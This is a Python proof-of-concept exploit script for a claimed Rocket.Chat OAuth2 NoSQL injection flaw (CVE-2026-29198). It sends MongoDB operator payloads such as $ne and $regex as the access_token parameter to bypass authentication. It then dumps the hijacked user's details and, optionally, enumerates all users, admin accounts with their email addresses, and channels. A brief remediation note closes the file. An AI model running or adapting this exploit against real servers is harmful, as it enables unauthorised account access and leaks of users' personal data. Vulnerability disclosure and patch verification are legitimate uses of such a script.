#!/usr/bin/env python3 """ ** PoC By HMs ** CVE-2026-29198 - Rocket.Chat OAuth2 NoSQL Injection -> Auth Bypass Usage: python3 poc_cve_2026_29198.py --url http://localhost:3000 python3 poc_cve_2026_29198.py --url http://target --escalate -v python3 poc_cve_2026_29198.py --url http://target --proxy http://127.0.0.1:8080 """ import requests import argparse import json import sys import time from urllib.parse import urlencode try: requests.packages.urllib3.disable_warnings() except ImportError: print("[!] requests not installed: pip install requests") sys.exit(1) # ── ANSI colours ────────────────────────────────────────────────────────────── R = "\033[91m"; G = "\033[92m"; Y = "\033[93m"; B = "\033[94m"; W = "\033[0m" def ok(msg): print(f"{G}[+]{W} {msg}") def err(msg): print(f"{R}[-]{W} {msg}") def inf(msg): print(f"{B}[*]{W} {msg}") def wrn(msg): print(f"{Y}[!]{W} {msg}") # ── NoSQL injection payloads ────────────────────────────────────────────────── PAYLOADS = [ ("$ne null", {"access_token[$ne]": "null"}), ("$ne empty", {"access_token[$ne]": ""}), ("$exists true", {"access_token[$exists]": "true"}), ("$gt empty", {"access_token[$gt]": ""}), ("$regex any", {"access_token[$regex]": "."}), ("$regex hex40", {"access_token[$regex]": "^[0-9a-f]{40}$"}), ] # ── HTTP helper ─────────────────────────────────────────────────────────────── def get(session, url, params=None, verbose=False): try: r = session.get(url, params=params, timeout=10, verify=False) if verbose: inf(f"GET {r.url} -> HTTP {r.status_code}") return r except requests.exceptions.ConnectionError: err(f"Connection refused: {url}") return None except requests.exceptions.Timeout: err(f"Timeout: {url}") return None # ── Step 1: probe for vulnerability ────────────────────────────────────────── def probe(session, base, verbose): inf("Step 1 — probing for NoSQL injection vulnerability") endpoint = f"{base}/api/v1/me" # Baseline: unauthenticated request should return 401 r = get(session, endpoint, verbose=verbose) if r is None: return None, None if r.status_code not in (401, 403, 200): wrn(f"Unexpected baseline status {r.status_code} — continuing anyway") for label, params in PAYLOADS: r = get(session, endpoint, params=params, verbose=verbose) if r is None: continue if r.status_code == 200: try: data = r.json() except ValueError: continue if data.get("success") and data.get("_id"): ok(f"Payload '{label}' succeeded!") return params, data if verbose: inf(f" Payload '{label}' -> {r.status_code}") return None, None # ── Step 2: dump victim user info ───────────────────────────────────────────── def dump_user(data): inf("Step 2 — leaked user info") fields = ["_id", "username", "name", "emails", "roles", "status", "active"] for f in fields: val = data.get(f) if val is not None: ok(f" {f}: {val}") # ── Step 3: escalate — list users, find admins ──────────────────────────────── def escalate(session, base, winning_params, verbose): inf("Step 3 — escalating: listing users via /api/v1/users.list") r = get(session, f"{base}/api/v1/users.list", params={**winning_params, "count": "50"}, verbose=verbose) if r is None or r.status_code != 200: err(f"users.list failed (HTTP {r.status_code if r else 'N/A'})") err(" Likely requires admin role — victim token may not be admin") return try: data = r.json() except ValueError: err("Non-JSON response from users.list") return users = data.get("users", []) ok(f"users.list returned {len(users)} users") admins = [u for u in users if "admin" in u.get("roles", [])] if admins: ok(f"Found {len(admins)} admin account(s):") for a in admins: ok(f" _id={a.get('_id')} username={a.get('username')} email={a.get('emails', [{}])[0].get('address', 'N/A')}") else: wrn("No admin accounts in first 50 users (may need pagination)") inf("Step 3b — trying /api/v1/channels.list (admin-only)") r2 = get(session, f"{base}/api/v1/channels.list", params={**winning_params, "count": "10"}, verbose=verbose) if r2 and r2.status_code == 200: try: ch = r2.json().get("channels", []) ok(f"channels.list returned {len(ch)} channels") for c in ch[:5]: ok(f" #{c.get('name')} (msgs: {c.get('msgs')})") except ValueError: pass else: wrn(f"channels.list -> {r2.status_code if r2 else 'N/A'}") # ── Step 4: check if patched ────────────────────────────────────────────────── def check_patched(session, base, verbose): inf("Patch check — sending string token to confirm baseline rejection") r = get(session, f"{base}/api/v1/me", params={"access_token": "INVALID_TOKEN_STRING"}, verbose=verbose) if r and r.status_code == 401: ok("String token correctly rejected (expected behaviour)") elif r and r.status_code == 200: wrn("String token accepted?! Check if this is a valid token collision") # ── Main ────────────────────────────────────────────────────────────────────── def main(): parser = argparse.ArgumentParser( description="CVE-2026-29198 PoC — Rocket.Chat OAuth2 NoSQL Injection") parser.add_argument("--url", required=True, help="Base URL, e.g. http://localhost:3000") parser.add_argument("--escalate", action="store_true", help="Attempt privilege escalation after bypass") parser.add_argument("--proxy", help="HTTP proxy, e.g. http://127.0.0.1:8080") parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output") args = parser.parse_args() base = args.url.rstrip("/") print(f""" {R}╔══════════════════════════════════════════════════════════╗ ║ CVE-2026-29198 Rocket.Chat OAuth2 NoSQL Injection PoC ║ ║ **PoC by HMs** ║ ╚══════════════════════════════════════════════════════════╝{W} Target : {base} """) session = requests.Session() session.headers.update({"User-Agent": "Mozilla/5.0 (PoC CVE-2026-29198)"}) if args.proxy: session.proxies = {"http": args.proxy, "https": args.proxy} inf(f"Proxy: {args.proxy}") # Connectivity check — /api/v1/info may return 403 on older versions, try fallback reachable = False for probe_url in [f"{base}/api/v1/info", f"{base}/api/v1/me", f"{base}/"]: r = get(session, probe_url, verbose=args.verbose) if r is not None: reachable = True if probe_url.endswith("/info") and r.status_code == 200: try: ver = r.json().get("info", {}).get("version", "unknown") ok(f"Server reachable — Rocket.Chat version: {ver}") except ValueError: ok("Server reachable") else: ok(f"Server reachable (HTTP {r.status_code} on {probe_url})") break if not reachable: err("Cannot reach target. Exiting.") sys.exit(1) check_patched(session, base, args.verbose) print() winning_params, user_data = probe(session, base, args.verbose) if winning_params is None: err("All payloads failed — two possible reasons:") err(" 1. Target is PATCHED (PR #39492 applied)") err(" 2. No active OAuth tokens in DB (no user has done OAuth2 flow yet)") sys.exit(1) print() dump_user(user_data) if args.escalate: print() escalate(session, base, winning_params, args.verbose) print(f""" {G}[SUMMARY]{W} Status : VULNERABLE Payload : {winning_params} Victim : {user_data.get('username')} (id={user_data.get('_id')}) Roles : {user_data.get('roles')} Impact : Unauthenticated access as any user with an active OAuth token {Y}[REMEDIATION]{W} Apply patch from PR #39492 or upgrade to a fixed version. Ensure typeof check on access_token query param before use. """) if __name__ == "__main__": main()